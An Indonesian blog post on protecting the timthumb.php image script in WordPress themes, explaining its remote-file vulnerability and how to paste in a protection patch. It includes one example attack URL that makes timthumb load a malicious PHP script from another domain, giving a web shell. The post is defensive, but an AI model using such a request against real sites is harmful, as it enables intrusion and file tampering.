Pengaman file timthumb.php

Timthumb adalah script php yang berfungsi untuk cropping, zoom dan merubah ukuran gambar (gif, jpg, png).
Script timthumb.php dapat diunduh gratis dari http://code.google.com/p/timthumb.

Tapi timthumb memiliki lobang keamanan, beberapa bulan yang lalu banyak blog berbasis wordpress kebobolan karena menggunakan tema yang gambarnya memakai timthumb.

Pemakaian timthumb yang sebenarnya semacam ini
http://domainmu.com/timthumb.php?src=http://domainlain.com/gambar.gif

Tapi oleh orang yang usil akan diakses dengan
http://domainmu.com/timthumb.php?src=http://domainlain.com/script-jahat.php
Maka orang usil tadi akan melihat web/blogmu bagaikan melihat isi komputer menggunakan windows explorer, dia bisa mengupload file, merubah isi file atau menghapusnya.
Kira-kira semacam ini tampilan script jahat tersebut (tapi ada juga versi yang lain).


Saya akan berbagi cara mudah untuk mengamankan file timthumb tersebut.

Pertama, download timthumb protection code.
Kemudian edit file timthumb.php, copy dan paste code yang sudah didownload tadi ke file timthumb di bagian atas/sebelum timthumb::start(); seperti gambar berikut

penempatan code

Mudah-mudahan tips ini bisa mengamankan web/blog anda yang menggunakan timthumb dari serangan orang yang tidak bertanggung jawab.